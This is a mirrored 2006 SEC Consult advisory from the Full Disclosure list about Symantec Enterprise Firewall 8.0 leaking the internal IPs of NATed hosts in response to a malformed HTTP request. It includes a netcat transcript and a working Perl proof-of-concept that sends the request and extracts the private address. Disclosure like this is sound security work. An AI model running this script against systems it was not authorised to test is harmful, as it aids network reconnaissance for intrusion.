The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP


<< Previous INDEX Search src / Print Next >>
Date: Fri, 12 May 2006 09:35:42 +0200
From: Bernhard Mueller <research@sec-consult.com.>
To: Full Disclosure <full-disclosure@lists.grok.org.uk.>,
Subject: SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP
 Proxy Private IP Exposure
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru

SEC Consult Security Advisory 20060512-0

title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure program: Symantec Enterprise FW vulnerable version: 8.0 homepage: www.symantec.com found: 2005-09-13 by: SEC Consult / www.sec-consult.com
Vendor description: --------------- Symantec's Enterprise Firewall provides complete network protection by integrating smart application-level proxies, network circuits and packet filtering into a special perimeter-security architecture (...) Vulnerabilty overview: --------------- Enterprise FW leaks internal IPs of natted machines in response to certain HTTP requests. Vulnerability details: --------------- A request of the form "get/XX HTTP/1.0" (note the missing space) triggers the exposure. The firewall seems to forward the request and to wait a certain time for a reply from the webserver, until the timeout is reaches. the final response from the firewall looks like: df0rm@b4byl0n:~> netcat www.behind-raptor.com 80 get/01 http/1.0 HTTP/1.1 504 Gateway Timeout MIME-Version: 1.0 Server: Simple, Secure Web Server 1.1 Date: Tue, 13 Sep 2005 06:23:32 GMT Connection: close Content-Type: text/html [...] The request seen by the firewall was: <tt><ul><li> http://10.238.94.57/01 Here's a simple script to map external to internal IPs. --------------- #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die "$0 <host>\n"; $request = "getXXX/XXX HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); die "could not open socket: $!\n" unless $sock; print $sock $request; print "waiting for timeout (this can take about 1 min.)\n"; while (<$sock>) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print "$host: $ip\n"; } else { print "failed.\n"; } close($sock); vendor status: --------------- vendor notified: 2005-09-13 vendor response: 2005-09-13 patch available: 2005-12 General remarks We would like to apologize in advance for potential nonconformities and/or known issues. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF SEC Consult / @2006 research at sec-consult dot com

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру